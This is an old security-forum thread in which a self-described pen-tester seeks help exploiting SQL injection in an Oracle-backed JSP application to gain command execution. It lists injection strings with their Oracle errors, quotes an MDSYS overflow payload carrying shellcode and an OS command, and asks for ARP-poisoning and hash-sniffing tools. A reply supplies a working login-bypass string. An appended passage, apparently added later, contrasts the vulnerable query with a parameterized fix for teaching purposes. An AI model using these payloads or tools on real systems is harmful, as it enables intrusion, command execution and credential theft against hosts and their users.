
Oracle SQL Injection help...


zgrp

Newbie

Posts: 6

Joined: Wed Apr 12, 2006 1:32 am

Post Wed Apr 12, 2006 1:53 am

Oracle SQL Injection help...

Hello,

This is my first post at this community; I hope I can help others too.

I'm pen-testing a host that has applications running
in JSP with Oracle as the back-end. I found 2 SQL injections in this application, but I have not been able to exploit them... if some Oracle SQL injection master can help me :(

The two scripts are like this:

One is a login form.

Two is a search form, where one of the options (the
city field) is vulnerable, so I believe it's an injection in a WHERE clause.

My objective is to use the Oracle database to execute commands on the server (I don't care about the data in the database).

If I try the following strings in the first one (login form)
(Reference http://www.securityfocus.com/infocus/1644):


;select username from all_users where ''x''=''x'

or exists (select 1 from sys.dual) and ''x''=''x'

union select username from all_users where ''x''=''x'

or ''x''=''x'' --'

I get: ORA-01756: quoted string not properly terminated

If I try the following string in the first one (login form) (Reference
http://www.appsecinc.com/presentations/ ... curity.pdf):


UNION select password from DBA_USERS where 'q' = 'q'

I got: ORA-00907: missing right parenthesis

That already looks better, since now it appears there is an unterminated parenthesis.

If I try the following strings in the first one (login form) (Reference
http://seclists.org/lists/pen-test/2001/Dec/0036.html):

(SELECT username FROM all_users WHERE 1=1)

I got an HTML access denied message (like when I type a
wrong user or password); it appears that subselects don't
work.

') UNION SELECT username FROM all_users WHERE (''='

I got: ORA-00904: invalid column name

However, all_users is a valid table and username is a valid column. :(

1 - Why does this happen? Does someone know? How can I fix it?

I gained access to the host by another attack and compromised the database, and just out of curiosity I checked it, and it really exists:

USERNAME
SYS
SYSTEM
OUTLN
WMSYS
ORDSYS
ORDPLUGINS
MDSYS
CTXSYS
XDB
ANONYMOUS
WKSYS
WKPROXY
...
...

I also found an interesting reference (http://security-papers.globint.com.ar/o ... abases.pdf)
where the author shows the possibility of executing an overflow via SQL injection, with a string like this for example:

A'||TO_CHAR(MDSYS.MD2.SDO_CODE_SIZE('AAAAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH'||CHR(131)||CHR(195)||CHR(9)||CHR(255)||CHR(227)||CHR(251)||CHR(90)||CHR(227)||CHR(120)||CHR(54)||CHR(141)||CHR(67)||CHR(19)||CHR(80)||chr(184)||chr(191)||chr(142)||chr(01)||chr(120)||chr(255)||chr(208)||chr(184)||chr(147)||chr(131)||chr(00)||chr(120)||chr(255)||chr(208)||'dir>c:\dir.txt'))--

2 - If I try it, I get ORA-00907: missing right parenthesis. Does someone know how I could use it in my example?

3 - Even if it worked, he redirects the output to c:\dir.txt; can't it be sent to stdout (the web page returned from the query)?

4 - Does someone know a tool where, for example, I find a SQL injection, pass it to the tool, and it makes several tries to detect the right way to make the queries? :)

ps: Off topic, has someone already had success (or knows how to) compiling programs that use raw sockets/libpcap/libnet with cygwin (like compiling
dsniff, ettercap, ...)?

ps2: Or do you know a good command-line password tool for Windows (that can be installed entirely from the command line) that does ARP poisoning and filters password hashes like NTLM, Oracle, SQL Server, etc.?

Thank you a lot.

Cya

pcsneaker

Jr. Member

Posts: 73

Joined: Mon Nov 07, 2005 12:23 pm

Post Wed Apr 12, 2006 5:58 am

Re: Oracle SQL Injection help...

That's a lot of different things you're trying to do.

Start with the most basic:

You said that you want to exploit a login form. The query constructed by a login form usually is something like:

select * from users where username =' Content of Textbox1'
and password = 'Content of Textbox2'


You mentioned that you tried to enter
 
or ''x''=''x'' --'


and get the error ORA-01756: quoted string not properly terminated. With your input the query will be:

select * from users where username =' or ''x''=''x'' --''
                                                  2 single quotes ^^
and password = 'Content of Textbox2'

If you modify your input slightly

    ' or 1=1 --

that will give you
select * from users where username ='' or 1=1 --'
                              2 single quotes ^^
and password = 'Content of Textbox2'

Now everything after the second '1' should be ignored and your query should work.

Hint: Try to figure out the query constructed by the form you want to exploit, write it down and look at it after modifying by your input...
MCSA:Security (W2k, W2k3)
MCSE:Security (W2k, W2k3)
CPTS, Network+
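To make pcsneaker's hint concrete, here is an added example (not code from the thread) that builds the login query the way a vulnerable form would, runs it against a constructed SQLite table standing in for the Oracle back-end, and puts it beside the parameterized form a fix would use. It assumes only that the form's query has the shape shown above and that the database treats "--" as a comment to end of line, as both Oracle and SQLite do.

```python
import sqlite3

# Added example, not code from the thread. An in-memory SQLite database
# stands in for the Oracle back-end (assumption: same query shape; both
# treat "--" as a comment to end of line). The users table is constructed.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (username text, password text)")
    conn.execute("insert into users values ('alice', 's3cret')")
    return conn

def build_login_query(username, password):
    """The concatenated SQL a vulnerable login form builds. It is one line,
    so a '--' in the input comments out everything after it."""
    return ("select * from users where username ='" + username
            + "' and password = '" + password + "'")

def login_vulnerable(conn, username, password):
    """Runs the concatenated query and returns the number of rows matched,
    or None when the database rejects the SQL (a syntax error, the SQLite
    counterpart of the ORA-01756 / ORA-00907 errors quoted in the thread)."""
    try:
        sql = build_login_query(username, password)
        return len(conn.execute(sql).fetchall())
    except sqlite3.OperationalError:
        return None

def login_parameterized(conn, username, password):
    """Hardened form: bind variables keep the input out of the SQL text, so
    the same strings are compared as data instead of being parsed as SQL."""
    rows = conn.execute(
        "select * from users where username = ? and password = ?",
        (username, password)).fetchall()
    return len(rows)

if __name__ == "__main__":
    db = make_db()
    # Inputs from the thread: the one that raised ORA-01756 and the fix.
    for user in ["alice", "or ''x''=''x'' --'", "' or 1=1 --"]:
        print(repr(user))
        print("  query:        ", build_login_query(user, "wrong"))
        print("  vulnerable:   ", login_vulnerable(db, user, "wrong"))
        print("  parameterized:", login_parameterized(db, user, "wrong"))
```

Writing the query out as build_login_query does is exactly the "write it down and look at it" step: the doubled quotes of the first input never close the string literal, while the second input closes it and comments out the password check, which the parameterized version ignores entirely.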
